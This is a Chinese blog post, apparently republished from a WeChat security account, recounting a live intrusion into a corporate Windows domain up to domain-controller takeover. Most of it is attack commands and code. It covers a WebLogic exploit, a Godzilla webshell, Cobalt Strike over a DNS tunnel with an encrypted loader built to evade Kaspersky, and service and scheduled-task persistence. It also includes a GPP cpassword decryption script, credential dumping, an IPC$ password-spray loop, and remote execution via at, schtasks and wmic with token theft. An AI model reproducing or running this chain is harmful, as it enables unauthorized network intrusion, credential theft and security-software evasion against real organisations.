一次真实内网渗透

  • A+
所属分类:安全文章

前言

内网搞的少,突然遇见一个,目的拿到域控就行了,期间有些其他操作就顺带提一下,主要写了拿域控这条线,目标外网ip:wip1,后面打码严重,见谅,技术比较菜,欢迎大佬们提出宝贵意见

打点

访问http://wip1/并添加一个随意路径,发现是weblogic

一次真实内网渗透

尝试利用weblogic的漏洞,CVE-2019-2725 成功

信息收集

ipconfig /all 发现存在域:gxxxxxxxxx.com

一次真实内网渗透

whoami /all 权限system

一次真实内网渗透

net user /domain 查看域用户(有点多)

一次真实内网渗透


net group "domain admins" /domain 查看域管理员 有 个administrator

一次真实内网渗透


net group "domain computers" /domain 查看域内主机名

一次真实内网渗透

net group "domain controllers" /domain 查看域控主机名,通过ping主机名 可以获取3台域控的ip

一次真实内网渗透


tasklist 查看进程有没杀软(存在卡巴斯基)

一次真实内网渗透


Netstat -ano 查看端口开放情况

一次真实内网渗透


arp -a 可以推测出内网可能有那些ip段和存活主机

一次真实内网渗透


query user || qwinsta 查看当前登陆用户(wip1/administrator登陆中)

一次真实内网渗透


主要的整理哈

  1. 目前知道内网有2个段当前主机内网ip为 192.xx.xx.x5

    10.xx.xx.xx 和 192.xx.xx.xx

  2. 域控的ip为

    192.xx.xx.x3 192.xx.xx.x2 10.xx.xx.x2

  3. 一些账号,一些主机名

为了方便后续操作,base64编码和解码写入jsp马(哥斯拉)

一次真实内网渗透


在利用certutil 解码:Certutil -decode a.txt a.jsp

一次真实内网渗透


内网渗透

CS 上线

因为存在卡巴,要绕过杀软,并且通过ping 外网是ping 不通的,可能改机器不能出网
dns隧道和加载器加载加密的shellcode实现上线
dns配置
配置方式如下买一个域名添加如下记录

一次真实内网渗透


cs中配置

一次真实内网渗透


用Stageless 的shellcode,也就是如下 不然可能会导致上线很慢或者不能上线

一次真实内网渗透

ip: 192.xx.xx.x5 上线

一次真实内网渗透

权限维持

创建自启动服务进行权限维持
sc create "xxx" binpath= "cmd /c start "C:/windows/temp/xxx.bat""&&sc config "xxx" start= auto&&net start xxx
成功上线
创建定时任务避免进程被杀 每周运行一次
schtasks /create /tn "xxx" /tr "C:/windows/temp/xxx.bat" /sc weekly /mo 1 /ru system
schtasks /run /tn "xxx"
成功上线

一次真实内网渗透

一次真实内网渗透


横向渗透

1.密码信息

  • 收集存在gpp目录中的各种明文或者加密账号
    shell dir \域名sysvol域名


    一次真实内网渗透


    批量查看那些文件中包括password
    shell findstr /s /i /m /c:"password" \域名SYSVOL域名Policies*.xml


    一次真实内网渗透

      利用shell type 查看其中加密的密码

       

一次真实内网渗透


       利用脚本解密


import sys
from Crypto.Cipher import AES
from base64 import b64decode

key = """
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""".replace(" ","").replace("n","").decode('hex')
cpassword = "加密的字符串"
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
o = AES.new(key, AES.MODE_CBC, "x00" * 16).decrypt(password)
print o[:-ord(o[-1])].decode('utf16')
  • 利用loagonpasswords 抓取密码,只抓到了本机administrator的密码

一次真实内网渗透


  • 数据库账号密码

一次真实内网渗透


其实还有rdp登录,浏览器等密码(没抓取,先尝试以上秘密)

2.横向获取所有主机ip

思路

  1. domain computers 组获取主机名 + ping

  2. Spn获取主机名+ping

    setspn -t /domain -q */* > spn.txt

因为dns实在太慢了,容易断开,而且该域比较大, 就没大规模ping和扫描, 通过看 domain computers 组 通过主机名发现了有些主机的功能, 通过ping 这些主机发现全都在192这个段,并且我们具有权限的那台主机也在这段,思考了哈就先弄192这个段吧

一次真实内网渗透

3.横向渗透

利用刚才获取的密码尝试192段 ,利用了cs自带psexec 等方法批量上线,发现都是不行的,应该是有杀软,只能手动来搞了
先利用进程注入一个administrator 权限的进程获得本地管理员权限

一次真实内网渗透


可以利用令牌窃取获取本地管理员权限

一次真实内网渗透

批量尝试,建立了链接

for /L %I in (1,1,254) do @net use 192.xx.xx.%Iipc$ "刚才获取的密码" /user:administrator

一次真实内网渗透


查看那些主机有管理员登陆过(在这期间也拿了几个具有有外网ip的webshell)
shell tasklist /s ip /v
发现192.xx.xx.x0 这太主机上有域管进程并且存在卡巴

一次真实内网渗透

copy shellcode 和加载器到建立ipc链接的主机上

一次真实内网渗透


利用at 定时任务进行上线
shell net time \ip2 查看远程主机时间

shell at time ip 12:57 xxx.bat


一次真实内网渗透


等了一会,幸运的是,成功上线,同样走的dns,其实可以结合第一个shell 走smb 隧道

一次真实内网渗透


同样做好权限维持,查看端口发现有对外网的链接, 走http 隧道(可以利用云函数做中转隐藏cs服务IP)
上线

一次真实内网渗透


期间休息过一阵子没有弄,加载器被杀完了,重新改加载器,上线,但是at 命令没了(估计被发现了)......,换schtasks
schtasks /create /F /s 192.xx.xx.x0 /u administrator /p "密码" /tn test /tr "c:windowstempxxxxx.bat" /sc DAILY /mo 1 /st 13:20
目前上线2台,192.xx.xx.x0 有域管理登录过,要想获取域管理员权限,常见抓秘密和hash,但是可能第二次面杀不到位,失败,还有查找各个文件等等,就不试了,直接令牌窃取,获取域管理员权限
gxxxxxxxxxxxadministrator

一次真实内网渗透

接下来就是登录域控,发现定时任务不行了,尝试wmic
shell wmic /node:192.xx.xx.x3 process call create "cmd.exe /c whoami>f:xxxxxxresult.txt"

一次真实内网渗透


copy shellcode 和加载器到建立ipc链接的主机上,然后执行

shell wmic /node:192.xx.xx.x3 process call create "cmd.exe /c f:xxxxxxx.bat"


一次真实内网渗透


上线


一次真实内网渗透

差不多行了,数据那些就不下载了,也不维权了,交差,后面利用frp 随便访问了哈内网的web,找到一个弱口令,可以设置域策略


一次真实内网渗透

结束

太菜了太菜了


作者:ascii****,转载于:先知社区。


END
一次真实内网渗透

干货|渗透学习资料大集合(书籍、工具、技术文档、视频教程)


一次真实内网渗透

点击上方,关注公众号

如文章对你有帮助,请支持点下“赞”“在看”

本文始发于微信公众号(HACK之道):一次真实内网渗透

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: